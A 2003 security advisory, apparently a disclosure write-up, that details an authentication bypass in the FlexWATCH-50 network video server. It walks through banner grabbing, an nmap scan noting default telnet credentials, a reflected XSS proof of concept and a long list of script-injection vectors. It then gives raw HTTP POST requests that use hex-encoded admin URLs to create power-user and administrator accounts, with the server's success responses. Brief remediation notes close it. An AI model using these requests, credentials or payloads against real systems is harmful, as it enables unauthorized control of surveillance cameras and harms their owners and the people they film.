Security_FlexWATCH-2.txt

`#=============================================================  
# Unauthorized Access vulnerability in FlexWATCH camera Server   
# Second Assault !  
#=============================================================   
  
  
Author: SLAIZER   
mail: slaizer[at]phreaker.net  
  
Vendor : SEYEON Technology  
System : FlexWATCH Network Video Server  
url : http://www.flexwatch.com/  
Mail: [email protected]  
  
Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003  
  
#====================  
# Introduction  
#====================  
  
A few months ago I published another document , explaining how to obtain entire access  
to the system of easy and fast form.  
The same document was sent to SEYEON before being published , since I did not obtain  
response of them , I decided to publish it. Two months after having being published ,  
SEYEON got in touch with me. They asked me that test a new system already patched to  
the bug , in order that I was saying to them that bugs had found .  
They demanded me that it should remove the name of the company of my previus document   
and thet he should not publish any more...  
In addition to realizing a work to the company with many economic benefits of completely  
free form , thing that I do not accept . I will always be ready to help to whom I needed   
it from free form where as I'm not demanded anything and much less I use propietary   
software. I'm sorry that it seems to be exagerate but nobody lives of the air.  
  
  
#===================  
# Description   
#===================  
  
·To examining the new system!  
  
slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80  
  
HTTP/1.0 302 Redirect  
Server: FlexWATCH-Webs <---------- :) the same everlasting banner  
Date: Mon Dec 1 01:01:26 2003  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://victim/index.htm  
Age: 1  
  
  
·In another version do not examine the services use , becouse I did not need it :P.  
  
root@Necora:~$ nmap -sS -P0 victim   
Interesting ports on victim (censured :P):  
  
PORT STATE SERVICE  
21/tcp open ftp <-------   
23/tcp open telnet <------- Default user/pass are root/root :P   
80/tcp open http <------- They are not also very interesting right now ,   
1024/tcp open kdm <------- but with the nice thing that is to use ssl :P.  
1755/tcp open wms <-------   
  
  
  
·It's time to see web application :  
  
·Sailing along the web we think that the system has changed a bit as for the tree of   
directories , but for the rest it seems to be equal .  
  
The first thing what we meet is a bug in the application entrusted to notify to us   
that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P .  
  
Cross-Site Scripting .  
  
Example :  
  
mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>  
  
Results :  
  
Access Error: Page not found   
  
when trying to obtain /hehe.html  
  
cannot open URL /hehe.html  
  
( The code is executed perfectly even two times are executed .. hehe . Turning out  
be of that time two windows alerting us with the message -Security ? ).  
  
View source :  
  
<html>  
<head>  
<title>Document Error: Page not found</title>  
</head>  
<body>  
<h2>Access Error: Page not found</h2>  
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>  
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>  
</body>  
</html>  
  
Note:   
  
This type of methods is well-known to gain access to the system by means of links malicious  
to do with the identification of some user .  
document.write / document.cookie / document.location..  
  
  
I expose different methods of injection Javascript extracted of Globbes Security Advisory #33:  
  
<a href="javascript#[code]">  
<div onmouseover="[code]">  
<img src="javascript:[code]">  
<img dynsrc="javascript:[code]"> [IE]  
<input type="image" dynsrc="javascript:[code]"> [IE]  
<bgsound src="javascript:[code]"> [IE]  
&<script>[code]</script>  
&{[code]}; [N4]  
<img src=&{[code]};> [N4]  
<link rel="stylesheet" href="javascript:[code]">  
<iframe src="vbscript:[code]"> [IE]  
<img src="mocha:[code]"> [N4]  
<img src="livescript:[code]"> [N4]  
<a href="about:<script>[code]</script>">  
<meta http-equiv="refresh" content="0;url=javascript:[code]">  
<body onload="[code]">  
<div style="background-image: url(javascript:[code]);">  
<div style="behaviour: url([link to code]);"> [IE]  
<div style="binding: url([link to code]);"> [Mozilla]  
<div style="width: expression([code]);"> [IE]  
<style type="text/javascript">[code]</style> [N4]  
<object classid="clsid:..." codebase="javascript:[code]"> [IE]  
<style><!--</style><script>[code]//--></script>  
<![CDATA[<!--]]><script>[code]//--></script>  
<!-- -- --><script>[code]</script><!-- -- -->  
<script>[code]</script>  
<img src="blah"onmouseover="[code]">  
<img src="blah>" onmouseover="[code]">  
<xml src="javascript:[code]">  
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>  
<div datafld="b" dataformatas="html" datasrc="#X"></div>  
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]  
  
  
·There has always to be verified the information that the client sends to the Servant , in this   
case the most obvius serious solution to verify that malicious characters are not inserted  
as for example substituing to their html equivalent.  
  
  
  
  
------------ u0xa ---------------  
  
  
  
·At the moment where I want to come it's to this url : admin/aindex.htm .  
That is where one finds the system-administration , so trying and using  
imagination I verify that it happens on having sent the request in hexadecimal format.  
  
Example :  
  
  
  
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm  
  
------------ Url encode to hex mode ----------------  
  
http://victim/%61%64m%69n/a%69nde%78.%68t%6D  
  
-----------------By SLAIZER tools ------------------  
  
I obtain this in text plain :  
  
  
------ code -----  
<html>  
<head>  
<script language="Javascript">  
onBlur=self.focus()  
</script>  
<frameset cols="196,*" framespacing="0" frameborder="0">  
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">  
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">  
</frameset>  
</head>  
</html>  
----- code -----  
  
  
  
:D It's my friend the frame of configuracion and it's in plain text ..  
We go for good way we are going to look if we can do something with this.  
  
  
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm   
  
------------ Url encode to hex mode ----------------  
  
http://victim/adm%69%6E/%61%64%6D%69n.%68tm  
  
-----------------By SLAIZER tools ------------------  
  
  
Here it is where we go away to centre , so we are going to see it!.  
  
Important links :  
_______________________  
|-Change Root | <---- /asp/pwdcfg.asp  
|Password configuration |   
| |  
|-Add User | <---- /asp/adduser.asp /* Let's go! */  
| |  
|-Delete User | <---- /asp/deluser.asp  
| |  
|-Access Level | <---- /asp/chglimit.asp  
|_______________________|   
  
  
  
slaizer@Necora:~$ nc victim 80   
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 152  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123  
&passconf=root123&group=POWER_USER&enabled=on&ok=OK  
  
  
----------- u0xa ------------  
  
<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>  
  
  
----------- u0xa ------------  
  
  
  
It seems that there is post correctly , but on having tried login shows us this error directly :  
  
Access Error: Forbidden  
  
When trying to obtain /admin/aindex.htm  
Access Denied Prohibited User .  
  
-------------------------------  
  
  
foh....but ... I login in :  
  
http://victim/app/idxas.html <----- Camera Administration.   
  
Login : slaizer  
password: root123  
  
  
|o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123   
that we add in the previous setp. We have already given a great steo improve..   
  
  
But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier   
having this user really more sufficient , but it is enought to us to done one more test but  
add another user to the group of ADMIN :  
  
Example  
  
slaizer@Necora:~$ nc victim 80   
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 147  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root  
&passconf=123root&group=ADMIN&enabled=on&ok=OK  
  
  
  
  
----------- u0xa ------------  
  
<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>  
  
  
----------- u0xa ------------  
  
At the moment ok! .  
  
  
I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!  
  
You can already do what you want in the system!!!  
  
The problem was becouse the directory /admin was already not allowin him access to the users as previously  
it was happening.  
  
  
#=========================  
# Solution :   
#=========================  
  
  
Always verify the type of request that the client realizes, since you can see I have used a miscellany of   
code hexadeciaml and ascii .  
The best solution is to create meetings of identification and to allow the access to such directories for   
the meeting.  
  
/* Note : login in www.flexwatch.com as technic e-mail suport... xD */  
  
  
#========================  
# GreetSssSss!!!  
#========================  
  
- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -   
  
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD  
[[Irc-Hispano : #boinasnegras , #ngsec]]   
  
`